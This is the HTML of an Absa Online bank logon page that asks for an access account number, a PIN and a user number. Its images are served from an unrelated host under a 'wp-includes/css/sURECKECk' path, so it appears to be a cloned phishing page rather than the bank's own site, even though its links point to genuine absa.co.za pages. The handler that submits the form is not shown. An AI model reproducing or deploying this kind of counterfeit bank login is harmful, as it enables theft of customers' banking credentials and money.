<div class="ap-container-highlevel">
                  <div class="ap-titlebar ap-heading-titlebar" style="padding-top: 0px;">
                     <div id="header_results" class="ap-bar-section ap-bar-title" style="color: #FFFFFF">
                        Logon&nbsp;
                        | Welcome to Absa Online
                     </div>
                  </div>
                  <div class="ap-container-content" id="ap-container-content" style="padding-bottom:5px; overflow: hidden">
                     <!-- PS: height must be set here to AUTO else it cuts of the bottom of the inner content -->
                     <div class="ap-login-columns ap-columns-2-lhs" style="padding-top: 0px;">
                        <!-- ap-column-1 -->
                        <div class="ap-column-1 accessAccountScreen" id="ap-column-1" styleold="width:389px; padding:0">
                           <div class="ap-login-container" id="ap-login-container">
                              <div class="ap-container-highlevel" style="width:379px;">
                                 <div class="ap-titlebar ap-heading-titlebar ap-heading-titlebar-login">
                                    <div class="ap-bar-section ap-bar-title" style="margin-top:8px; margin-left:0px" tabindex="5">
                                       &nbsp;&nbsp;Logon details
                                    </div>
                                    <div style="float:right; margin-right: 10px;">
                                       <div style="background: url('https://ib.absa.co.za/absa-online/static/style/resources/icon-questionmark-grey_2019.png') no-repeat scroll left top transparent; margin-top: 6px; height: 30px; width: 20px; cursor: pointer;" onclick="showHideHelp(this)" tooltip="Click here to Show me how."></div>
                                    </div>
                                 </div>
                                 <div class="ap-container-content">
                                    <div class="ui-keypad" style="width:376px;">
                                       <form novalidate="" class="ui-form" method="post" formtype="nosubmit" onsubmit="onForm1Submit(); return false;">
                                          <!-- Input form -->
                                          <table class="ui-grid ui-keypad-inputs" style="width:378px;float:left;">
                                             <tbody>
                                                <tr class="ui-row">
                                                   <td class="ui-cell" style="width:200px;">
                                                      <label for="j_username" id="id-5978">
                                                      <span>Enter your access account number</span>
                                                      <span class="vi-screenreader-line">. An access account number is
                                                      the bank account number you choose when you registered for the Absa
                                                      Online service. It could can be your current, savings, or credit card
                                                      account number.</span></label>
                                                   </td>
                                                   <td class="ui-cell" style="nowrap:nowrap;">
                                                      <div style="text-align:left;">
                                                         <input bbf_type="simple:decimal10" bbf_required="true" bbf_x_type_number="true" requiredtext="Field is required." schematypetext="Only numbers are allowed (Maximum 16)" showmehow="An access account number is the bank account number you choose when you registered for the Absa Online service. It could can be your current, savings, or credit card account number." messageref=".errorMessage" class="ui-form-field ui-textBox ui-keypad-input-selected ap-showMeHow-focus vi-activeElement" style="width:132px; height:18px; line-height:18px; vertical-align:middle;" name="AccessAccount" autocomplete="off" id="j_username" onchange="" maxlength="16" type="input" tabindex="0" aria-invalid="false" aria-required="true" aria-labelledby="id-5978">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class="ui-row">
                                                   <td class="ui-cell">
                                                      <label for="j_pin">
                                                      <span>Enter your PIN</span>
                                                      </label>
                                                   </td>
                                                   <td class="ui-cell">
                                                      <div style="text-align:left;">
                                                         <input ondragstart="return false" onselectstart="return false" value="" bbf_type="simple:pin" bbf_required="true" class="ui-form-field ui-textBox" style="width:132px; height:18px; line-height:18px; vertical-align:middle;" name="PIN" id="j_pin" maxlength="5" ondrag="return false" oncopy="return false" autocomplete="off" requiredtext="Field is required." schematypetext="Only numeric values are allowed" showmehow="The PIN must be numeric and cannot contain alpha characters, e.g. *, #, @ or a, b, c. The PIN can be either four or five digits long." messageref=".errorMessage" type="password" tabindex="0">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class="ui-row">
                                                   <td class="ui-cell">
                                                      <label for="j_user_no">
                                                      <span>Enter your user number</span>
                                                      </label>
                                                   </td>
                                                   <td class="ui-cell">
                                                      <div style="text-align:left;">
                                                         <input value="1" class="ui-form-field ui-textBox " name="Operator" style="width:132px; height:18px; line-height:18px; vertical-align:middle;" id="j_user_no" maxlength="4" bbf_type="simple:decimal" bbf_x_type_number="true" bbf_required="true" requiredtext="Field is required." schematypetext="Only numeric values are allowed" showmehow="Absa Online can have more than one user per service and each user has their own Absa Online PIN. You must use the user number assigned to you at registration when you logon to the service." messageref=".errorMessage" type="text" tabindex="0">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <!-- Captcha Stuff -->
                                                <tr class="ui-row ui-row-captcha " id="ui-row-captcha" style="display:none;">
                                                   <td class="ui-cell">
                                                      <label class="ui-label ap-label-details" for="j_user_no" offsetx="0" offsety="10" tooltip="You have entered some of your logon credentials incorrectly. Please type the characters displayed in the CAPTCHA image, in the text box below the image. Remember to also retype your access account number and PIN in the usual text boxes.">
                                                      <span>Enter code in the box below</span><span class="ui-label--icon"></span>
                                                      </label>
                                                   </td>
                                                   <td class="ui-cell">
                                                      <div style="text-align:left;">
                                                         <div class="ui-jcaptcha jcaptcha_container">
                                                            <div class="jcaptcha_menu">
                                                               <button class="ui-button jcaptcha-icon-image jcaptcha-icon-hide ui-captchaCheck--iconHide" type="button" onclick="absa.jcaptcha.getImageChallenge(this)" tooltip="Get an image challenge">
                                                               </button>
                                                               <button class="ui-button jcaptcha-icon-sound ui-captchaCheck--iconSound" type="button" onclick="absa.jcaptcha.getSoundChallenge(this)" tooltip="Get a sound challenge">
                                                               </button>
                                                               <button class="ui-button jcaptcha-icon-refresh" type="button" onclick="absa.jcaptcha.refreshChallenge(this)" tooltip="Get a new challenge">
                                                               </button>
                                                               <button class="ui-button jcaptcha-icon-help jcaptcha-icon-hide ui-captchaCheck--iconHide" type="button" onclick="absa.jcaptcha.help(this)" tooltip="Help">
                                                               </button>
                                                            </div>
                                                            <div class="jcaptcha_lnk ui-captchaCheck_lnk">
                                                               <img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/dot_002.gif" class="jcaptcha_img ui-captchaCheck_img" id="jCaptchaImgID" title="Captcha">
                                                            </div>
                                                            <div class="jcaptcha_input">
                                                               <input ondragstart="return false" onselectstart="return false" class="ui-form-field ui-textBox ui-jcaptcha-textBox" name="CaptchaTxt" id="j_jcaptcha_txt" ondrag="return false" oncopy="return false" autocomplete="off" bbf_type="simple:alphanumeric" bbf_required="true" requiredtext="Enter the values from the given captcha" schematypetext="Enter the values from the given captcha" showmehow="Enter the values from the given captcha" messageref=".errorMessage" type="input" tabindex="0">
                                                            </div>
                                                            <!-- Modal Captcha Help -->
                                                            <div class="modalCaptchaHelp jcaptcha_help ui-captchaCheck_help" style="display:none; z-index:200;">
                                                               <div class="ap-popup">
                                                                  <div class="ap-popup-header">
                                                                     <b>Captcha Help</b>
                                                                     <div class="clear-both"></div>
                                                                  </div>
                                                                  <div class="ap-popup-body ap-info-box">
                                                                     <ul class="ap-info-box-ul">
                                                                        <li>Enter the words you see in the box, in order and
                                                                           separated by a space. Doing so helps prevent automated programs from
                                                                           abusing this service
                                                                        </li>
                                                                        <li>If you are not sure what the words are, either enter your best guess or click the reload button next to the distorted words</li>
                                                                        <li>Visually impaired users can click the audio button to hear a set of words that can be entered instead of the visual challenge.</li>
                                                                     </ul>
                                                                  </div>
                                                                  <div class="ap-popup-footer" style="text-align:right;">
                                                                     <button onclick="phe.modal.hideModal()" type="button" tabindex="0" class="ui-button ap-button-extra">
                                                                        <div class="ui-button-left">
                                                                           <div class="ui-button-right">
                                                                              <div role="button" tabindex="22" class="ui-button-center">Ok</div>
                                                                           </div>
                                                                        </div>
                                                                     </button>
                                                                  </div>
                                                               </div>
                                                            </div>
                                                         </div>
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class="ui-row">
                                                   <td class="ui-cell" colspan="2" style="padding-top:2px">
                                                      <span style="color: #767676;">It is your responsibility to ensure the secrecy of your PIN number.</span>
                                                   </td>
                                                </tr>
                                             </tbody>
                                          </table>
                                          <!-- Keypad -->
                                          <div style="float:right; width:325px; padding:5px; margin:0 20px 10px 20px; border:1px dashed #C3C3C3; background:#FFFFFF;">
                                             <div style="float:right; margin-right:96px;">
                                                <div style="-moz-user-select: none;" class="ui-keypad-padContainer">
                                                   <p>Keypad</p>
                                                   <table>
                                                      <tbody>
                                                         <tr>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">1</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">2</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">3</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">4</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">5</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">6</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">7</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">8</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">9</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class="ui-keypad-button util" action="backspace">
                                                                  <div class="backspace" unselectable="on"></div>
                                                               </div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button" unselectable="on">0</div>
                                                            </td>
                                                            <td>
                                                               <div class="ui-keypad-button util" action="clear" unselectable="on">C</div>
                                                            </td>
                                                         </tr>
                                                      </tbody>
                                                   </table>
                                                </div>
                                             </div>
                                          </div>
                                          <div class="clear-both"></div>
                                          <div class="ui-formFoot">
                                             <div class="genericMessage-place-holder" style="display:block">
						<div id="ap-login-form1-error" role="alert" tabindex="0" class="ui-message ui-message-error" style="display:none">
                                                    <span class="vi-screenreader-line "> Error details. </span>
                                                    <div class="ui-message-timeStamp">2019-09-26 10:39:56</div>
                                                    <div class="ui-message--icon"></div>
                                                    <div style="margin-right: 120px" class="ui-message-content">
                                                        <div class="ui-message-title"></div>
                                                        <div class="ui-message-body" style="clear:both;">Invalid credentials entered. Re-enter the required logon information.</div>
                                                    </div>
                                                    <div class="clear-both"></div>
						</div>
                                            </div>
                                             <div class="validation-place-holder"></div>
                                             <div class="ui-buttonFooter">
                                                <div class="ui-exception-container" style="border:none">
                                                   <!-- <div style="float:left"> -->
                                                   <div style="z-index:999; position:fixed; top:16px; right:50px; color:#6D6767; font-weight:bold;">
                                                      <div id="divToAfrikaans">
                                                         <a tabindex="-1" href="#" onclick="changeLang()" style="color:#6D6767; text-decoration:none; font-size:10px; padding-right: 5px;">Verander na Afrikaans</a>
                                                         <img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/locale_en.gif" title="" style="vertical-align:middle;">
                                                      </div>
                                                   </div>
                                                   <!-- Reset Pin link -->
                                                   <div style="float:left; padding-left:auto; padding-right:auto;">
                                                      <a tabindex="-1" href="#" onclick="absa.login.onResetPinClick(this)" style="color:#AF154B; text-decoration:underline; padding-left: 10px;">Reset PIN</a>
                                                   </div>
                                                   <!-- FORGOTPIN LINK
                                                      <div style="float:left; padding-left:auto; padding-right:auto;">
                                                      	<a tabindex="-1" href="#" onclick="forgotPin()" style="color:#646464; text-decoration:underline; padding-left: 5px;">Click here to reset your PIN</a>
                                                      </div> -->
                                                   <!-- BACK BUTTON : DSP and FEATURE STORE -->
                                                   <button aria-label="Reset" type="button" tabindex="1" onclick="resetForm1()" class="ui-button ap-button-reset">
                                                      <div class="ui-button-left">
                                                         <div class="ui-button-right">
                                                            <div class="ui-button-center">Reset</div>
                                                         </div>
                                                      </div>
                                                   </button>
                                                   <button aria-label="Next" type="submit" tabindex="0" class="ui-button ap-button-next">
                                                      <div class="ui-button-left">
                                                         <div class="ui-button-right">
                                                            <div class="ui-button-center">Next</div>
                                                         </div>
                                                      </div>
                                                   </button>
                                                </div>
                                             </div>
                                          </div>
                                       </form>
                                    </div>
                                 </div>
                                 <div class="ap-container-bottom-corners">
                                    <div class="ap-corners-rounded-bottom-left"></div>
                                    <div class="ap-corners-rounded-bottom" style="width:363px;"></div>
                                    <div class="ap-corners-rounded-bottom-right"></div>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <!-- ap-column-2 -->
                        <div class="ap-column-2 accessAccountScreenAdds" id="ap-column-2" styleold="width:550px;">
                           <div id="divadds1" style="position:relative; width:100%; margin-bottom:10px;">
                              <div style="float:left; width:270px; margin-right:10px;">
                                 <!-- Security Center Links -->
                                 <div id="divsecuritycentre" class="ap-login-block-rounded">
                                    <!-- top round borders -->
                                    <div class="ap-login-block-rounded-top">
                                       <div class="ap-corners-rounded-top-left"></div>
                                       <div class="ap-corners-rounded-top"></div>
                                       <div class="ap-corners-rounded-top-right"></div>
                                    </div>
                                    <!-- content -->
                                    <div role="tablist" class="ui-tabBox">
                                       <ul class="ui-tabHeads">
                                          <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="18">
                                             Security centre
                                             <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                                          </li>
                                       </ul>
                                       <div class="ui-tabBodies">
                                          <div tabindex="19" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                                             <div style="background: #FFFFFF;">
                                                <ul class="abc">
                                                   <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Absa's online security measures</a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Important information about phishing</a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Protect yourself online</a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Online shopping and 3D Secure</a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/scams/" id="am" target="_new">Latest scams</a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/absa-tools/" id="am" target="_new">Latest internet security software</a></li>
                                                </ul>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                    <!-- bottom round borders -->
                                    <div class="ap-login-block-rounded-bottom">
                                       <div class="ap-corners-rounded-bottom-left"></div>
                                       <div class="ap-corners-rounded-bottom"></div>
                                       <div class="ap-corners-rounded-bottom-right"></div>
                                    </div>
                                 </div>
                              </div>
                              <div style="float:left; width:270px;">
                                 <!-- Important Links on Right Side of Page -->
                                 <div id="divimportantlinks" class="ap-login-block-rounded">
                                    <!-- top round borders -->
                                    <div class="ap-login-block-rounded-top">
                                       <div class="ap-corners-rounded-top-left"></div>
                                       <div class="ap-corners-rounded-top"></div>
                                       <div class="ap-corners-rounded-top-right"></div>
                                    </div>
                                    <!-- content -->
                                    <div role="tablist" class="ui-tabBox">
                                       <ul class="ui-tabHeads">
                                          <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="13">
                                             Important links
                                             <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                                          </li>
                                       </ul>
                                       <div class="ui-tabBodies">
                                          <div tabindex="14" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                                             <div style="background: #FFFFFF;">
                                                <ul class="abc">
                                                   <li><a href="https://www.absa.co.za/media-centre/press-statements/2016/old-interface-switched-off/" id="am" target="_new">Old interface switched off</a></li>
                                                   <li><a href="https://ib.absa.co.za/absa-online/registration/?lang=en" id="am" target="_new">How to register</a></li>
                                                   <li><a href="https://www.absa.co.za/media-centre/press-statements/2016/absa-listed-beneficiaries-accounts-closed/" id="am" target="_new">Absa Listed Beneficiaries - accounts closed</a></li>
                                                   <li><a href="https://www.absa.co.za/media-centre/press-statements/absa-online-payments-issue-notice" id="am" target="_new"><b>Inter-Bank Payment delay</b></a></li>
                                                   <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Security enhancement</a></li>
                                                   <li><a href="https://www.absa.co.za/talk-to-us/" id="am" target="_new">Contact us</a></li>
                                                </ul>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                    <!-- bottom round borders -->
                                    <div class="ap-login-block-rounded-bottom">
                                       <div class="ap-corners-rounded-bottom-left"></div>
                                       <div class="ap-corners-rounded-bottom"></div>
                                       <div class="ap-corners-rounded-bottom-right"></div>
                                    </div>
                                 </div>
                              </div>
                              <div style="clear:both;"></div>
                              <div style="position:relative; margin-top:10px; height:152px;">
                                 <div class="ap-login-campaign-image img1" style="position:absolute; top:0px; left:0px; width:280px;"><a href="https://www.absa.co.za/offers/safety-and-security/"><img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/campaigne_1_ENG.png" alt=""></a></div>
                                 <div class="ap-login-campaign-image img2" style="position:absolute; top:0px; right:0px; width:270px;"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/campaigne_3_post_golive_EN.jpg" alt=""></a></div>
                              </div>
                           </div>
                           <!-- How it Works Right of 2nd page -->
                           <div id="divhowitworks" class="ap-login-block-rounded" style="display:none">
                              <div>
                                 <!-- top round borders -->
                                 <div class="ap-login-block-rounded-top">
                                    <div class="ap-corners-rounded-top-left"></div>
                                    <div class="ap-corners-rounded-top" style="width:312px;"></div>
                                    <div class="ap-corners-rounded-top-right"></div>
                                 </div>
                                 <!-- content -->
                                 <div role="tablist" class="ui-tabBox">
                                    <ul class="ui-tabHeads">
                                       <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="15">
                                          How it works
                                          <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                                       </li>
                                    </ul>
                                    <div class="ui-tabBodies">
                                       <div tabindex="16" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                                          <div style="background: #FFFFFF;">
                                             <div style="border-bottom: 1px solid #CCCCCC;">
                                                <div style="padding: 10px;">In this example the password is <b>Password1</b></div>
                                             </div>
                                             <div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
                                                <span class="pfsmalltxt">a</span> <span class="pfsmalltxt">s</span>
                                                <span class="pfsmalltxt">s</span> <span class="pfsmalltxt">w</span>
                                                <span class="pfsmalltxt">o</span> <span class="pfsmalltxt">r</span>
                                                <span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
                                             </div>
                                             <div style="margin: 10px 0px 5px 10px;">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                             </div>
                                             <div style="border-top: 1px solid #CCCCCC; border-bottom: 1px solid #CCCCCC; padding: 10px;">
                                                You have to enter (case sensitive):
                                             </div>
                                             <div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
                                                <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
                                                <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
                                                <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;</span>
                                                <span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
                                             </div>
                                             <div style="margin: 10px 0px 5px 10px;">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
                                                <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                                <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                             </div>
                                             <br>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                                 <!-- bottom round borders -->
                                 <div class="ap-login-block-rounded-bottom">
                                    <div class="ap-corners-rounded-bottom-left"></div>
                                    <div class="ap-corners-rounded-bottom" style="width:312px;"></div>
                                    <div class="ap-corners-rounded-bottom-right"></div>
                                 </div>
                              </div>
                              <div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px 0px;" id="ap-campaignImage-div"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/campaigne_3_post_golive_EN.jpg" alt=""></a></div>
                              <div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px 0px;" id="ap-campAPBImage-div"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/images/campaigne_3_post_golive_EN.jpg" alt="AOL Express"></a></div>
                           </div>
                        </div>
                        <!-- ap-column-2 -->
                        <div class="ap-columns-clear"></div>
                     </div>
                     <!-- ap-columns-2-lhs -->
                     <div style="width: 100%; height: 10px;"></div>
                     <!-- 3 column layout -->
                     <div id="divbottomadds" class="ap-login-columns ap-columns-33">
                        <!-- ap-column-1 -->
                        <div class="ap-column-1">
                           <!-- Security Centre Links Bottom left of Login page 1 -->
                           <!-- PS: Was moved for Resonance to be next to input fields -->
                           &nbsp;
                        </div>
                        <!-- ap-column-2 -->
                        <div class="ap-column-2">
                           <!-- Campaign Banner 1 used to be here -->
                           &nbsp;
                        </div>
                        <!-- ap-column-3 -->
                        <div class="ap-column-3">
                           <!-- Campaign Banner 2 used to be here -->
                           &nbsp;
                        </div>
                     </div>
                  </div>
                  <!-- bottom rounded corners -->
                  <!-- <div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-show"> -->
                  <div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-hide">
                     <div class="ap-corners-rounded-bottom-left"></div>
                     <div class="ap-corners-rounded-bottom"></div>
                     <div class="ap-corners-rounded-bottom-right"></div>
                  </div>
               </div>